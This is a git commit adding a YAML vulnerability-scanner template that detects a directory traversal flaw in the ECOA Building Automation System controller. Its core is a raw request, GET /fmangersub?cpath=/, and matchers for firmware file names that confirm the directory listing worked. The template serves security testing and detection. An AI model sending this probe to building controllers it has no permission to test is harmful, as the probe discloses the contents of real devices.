Create ecoa-building-directory-traversal.yaml

The BAS controller suffers from a directory traversal content disclosure vulnerability. Using the GET parameter cpath in File Manager (fmangersub), attackers can disclose directory content on the affected device Signed-off-by: GwanYeong Kim <gy741.kim@gmail.com>
2021-09-25 08:58:58 +09:00 · 2021-09-25 08:58:58 +09:00 · fac7f96b34
parent a71e2c9e62
commit fac7f96b34
1 changed files with 23 additions and 0 deletions
--- a/vulnerabilities/other/ecoa-building-directory-traversal.yaml
+++ b/vulnerabilities/other/ecoa-building-directory-traversal.yaml
@ -0,0 +1,23 @@
+id: ecoa-building-directory-traversal
+
+info:
+  name: ECOA Building Automation System - Directory Traversal Content Disclosure
+  author: gy741
+  severity: high
+  description: The BAS controller suffers from a directory traversal content disclosure vulnerability. Using the GET parameter cpath in File Manager (fmangersub), attackers can disclose directory content on the affected device
+  reference: https://www.zeroscience.mk/en/vulnerabilities/ZSL-2021-5670.php
+  tags: ecoa,traversal
+
+requests:
+  - raw:
+      - |
+        GET /fmangersub?cpath=/ HTTP/1.1
+        Host: {{Hostname}}
+
+    matchers:
+      - type: word
+        words:
+          - "bacevent.elf"
+          - "redown.elf"
+          - "system.bin"
+        condition: and